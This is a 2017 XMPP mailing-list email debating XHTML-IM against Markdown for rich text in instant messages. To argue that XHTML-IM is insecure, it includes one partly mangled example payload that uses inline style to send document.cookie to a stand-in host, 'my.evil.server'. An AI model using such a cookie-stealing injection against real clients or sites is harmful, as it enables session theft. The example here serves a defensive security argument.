On 12 October 2017 at 09:27, Goffi <go...@goffi.org> wrote:
> Hi David,
>
> Le jeudi 12 octobre 2017, 10:09:41 CEST Dave Cridland a écrit :
>
>> There are dozens of quite reasonable Markdown libraries in Javascript.
>> These will handle, suppress, and otherwise deal with embedded HTML.
>> Every other IM system I can find just does Markdown of some flavour.
>> XHTML is, pretty much, dead at this point anyway.
>
> There are dozen of flavours of Mardown, not always compatibles, it's not a
> syntax adapted for XML, and it's really limited (no table/color by default for
> instance). Markdown is not standardized, which make it quite a bad choice to
> be used in a standard protocol. And what if in 5 year an other syntax is
> trendy?

I think there may be an argument for XHTML-IM in things other than IM,
yes. Which is ironic considering the name.

But out of curiosity, do you allow inline style in your uses of XHTML-IM?

So can something like the following work:

Image().src=&apos;http://my.evil.server/?cookie=&apos; +
encodeURI(document.cookie);&dquot;);'>Hello</p>

A solid CSP will block this for newer browsers, of course, and
background-image is a SHOULD NOT in XEP-0071 as well. But I'd be
surprised if many implementations are filtering CSS at the property
level.

I'm depressingly well aware of the failure of Markdown to standardize
on a single dialect, but I'm also well aware that the state of the art
in HTML-based applications is to use simple Markdown rather than HTML
for any user entered rich text, because of the very high risk of
security problems.

> I don't really see the point of changing to a syntax just because it's popular
> now when XHTML-IM is perfectly adapted to XML, standardized, and working well
> (and Markdown can be trivially converted to XHTML-IM, so it's already usable
> at the moment).
>
> And again, we are going for years of incompatibilities by changing it now.

Honestly, I think we're trading years of insecurity for a little
incompatibility.

Dave.